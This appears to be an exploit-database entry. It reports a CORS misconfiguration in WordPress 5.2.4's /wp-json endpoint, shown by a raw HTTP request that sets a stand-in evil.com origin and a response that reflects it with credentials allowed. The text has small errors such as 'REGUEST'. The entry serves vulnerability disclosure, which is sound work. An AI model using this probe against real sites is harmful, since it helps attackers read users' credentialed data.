# Exploit Title: Wordpress 5.2.4 - Cross-Origin Resource Sharing # Date: 2019-10-28 # Exploit Author: Milad Khoshdel # Software Link: https://wordpress.org/download/ # Version: Wordpress 5.2.4 # Tested on: Linux Apache/2 PHP/7.2 # Vulnerable Page: https://[Your-Domain]/wp-json # POC: # The web application fails to properly validate the Origin header (check Details section for more information) # and returns the header Access-Control-Allow-Credentials: true. In this configuration any website can issue # requests made with user credentials and read the responses to these requests. Trusting arbitrary # origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites. # REGUEST --> GET /wp-json/ HTTP/1.1 Origin: https://www.evil.com Accept: */* Accept-Encoding: gzip,deflate Host: [Your-Domain] User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Connection: Keep-alive # RESPONSE --> HTTP/1.1 200 OK Date: Mon, 28 Oct 2019 07:34:39 GMT Server: NopeJS X-Robots-Tag: noindex Link: <https://[Your-Domain].com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages Access-Control-Allow-Headers: Authorization, Content-Type Allow: GET Access-Control-Allow-Origin: https://www.evil.com Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE Access-Control-Allow-Credentials: true Vary: Origin,Accept-Encoding,User-Agent Keep-Alive: timeout=2, max=73 Connection: Keep-Alive Content-Type: application/json; charset=UTF-8 Original-Content-Encoding: gzip Content-Length: 158412